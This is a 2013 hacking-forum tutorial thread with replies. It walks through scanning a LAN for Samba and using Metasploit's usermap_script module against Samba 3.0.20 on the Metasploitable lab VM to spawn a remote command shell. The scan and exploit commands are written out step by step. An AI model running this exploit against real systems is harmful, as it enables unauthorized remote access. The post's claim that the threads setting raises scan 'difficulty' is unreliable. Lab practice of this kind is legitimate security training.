Tutorial Samba Exploit [Spawn a command shell on the Victim]

Tutorial Samba Exploit [Spawn a command shell on the Victim] - Printable Version

+- Sinisterly (https://sinister.ly)
+-- Forum: Hacking (https://sinister.ly/Forum-Hacking)
+--- Forum: Network Hacking (https://sinister.ly/Forum-Network-Hacking)
+--- Thread: Tutorial Samba Exploit [Spawn a command shell on the Victim] (/Thread-Tutorial-Samba-Exploit-Spawn-a-command-shell-on-the-Victim)

Samba Exploit [Spawn a command shell on the Victim] - Crypt - 11-17-2013

Hello everyone, this will be my 3rd security tutorial.

This particular exploit exploits Samba version 3.0.20 and spawns a remote command shell on the victim.

The tools/programs we will be using today are:

VirtualBox (Unless you use BackTrack 5 R3 or Kali Linux as your main operating system) OR VMware
Backtrack 5 R3 (or Kali Linux)
Metasploitable (You can download it here)
Metasploit (Included in BackTrack 5 R3 and Kali Linux)

I'm not going to explain to you how to set up backtrack, kali linux, or metasploitable on virtualbox because that is not what the tutorial is for.

Alright, on with the tutorial.

First things first, start up Backtrack/Kali and Metasploitable. When it brings you to the login for Metasploitable, type in msfadmin as the user and msfadmin as the password.

After you've done that, get Metasploitable's internal ip by typing this in the console/command prompt -

Code:
ifconfig

If your network is set up correctly on the virtual machine, it should do something like this. The ip I put the red box over is where your internal ip should come up, mine is 192.168.1.88
Memorize the ip or store it somewhere incase you forget it.

[Image: otLdHwZ.png]

Now that you've done that, head over to back track an start up metasploit by opening a terminal window and typing

Code:
msfconsole

It will take a minute or so for metasploit to start up. Once it has started up, it should look something like this.

[Image: NI4UYpZ.png]

Alright, now that we're done with the first few steps, let's get to the fun part. In the metasploit console you'll type

Code:
use auxiliary/scanner/smb/smb_version

This scanner (depending on the options you enter in, we'll get to that in a second) scans every host on your LAN to see if they're running samba and what version they're running. Now go ahead and type in "show options" without the quotes. You should get a menu telling you what options there are, as well as what's required and what isn't. It should look like this -

[Image: AG0y6qU.png]

Now, you'll type

Code:
set rhosts 192.168.1.0/24

This scans everything on your network from 192.168.1.0 and up to see if they're running samba and what version they're running.

Now we're going to pump the threads up to 75. This tells that the difficulty is 75, meaning it will search harder and do a better scan than if it were set to 1. Go ahead and type in

Code:
set threads 75

Once you've done that, it's time to start the scanner. Type "run" without the quotes and give it a second to scan the network.

It should look something like this when it's done -

[Image: tpEpxf4.png]

Try to find metasploitable's internal ip and next to it it should say

Quote:internaliphere:445 is running Unix Samba 3.0.20-Debian (language: Unknown) (domain:WORKGROUP)

(This is optional)

In the metasploit console type in

Code:
search samba

This will give you every exploit module that contains the word "samba" in it, this is just so you can see the different types and whatnot. But for this tutorial we're using exploit/multi/samba/usermap_script. This gives us the privilege to perform Remote Command Execution. So in the console type

Code:
use exploit/multi/samba/usermap_script

Now type

Code:
show options

and that will give you the options for this particular exploit.

[Image: HFY5KOz.png]

As you can see one of the options is RHOST. You're going to set the rhost to metasploitable's internal. In the console type in

Code:
set rhost metasploitableinternaliphere

So for me it would be

Code:
set rhost 192.168.1.88

And when you're ready, go ahead and type "exploit" without the quotation marks.

If you've done everything correctly, your metasploit window should look something like this.

[Image: YXlSxWz.png]

BOOM! There you go. You have now spawned a command shell and owned this box. From there, you can type in anything that you'd be able to type in in a Unix machine's command prompt.

I hoped you all liked this tutorial, please feel free to post comments, questions, or concerns and keep the thread alive.

Peace Cool

RE: Samba Exploit [Spawn a command shell on the Victim] - Lotus Black - 03-31-2014

Something new for me, thanks mate.

RE: Samba Exploit [Spawn a command shell on the Victim] - Zayne - 03-31-2014

You actually wont need backtrack or kali, but the packages.

RE: Samba Exploit [Spawn a command shell on the Victim] - G0d - 03-31-2014

This is a fun exploit. Gonna go try it now.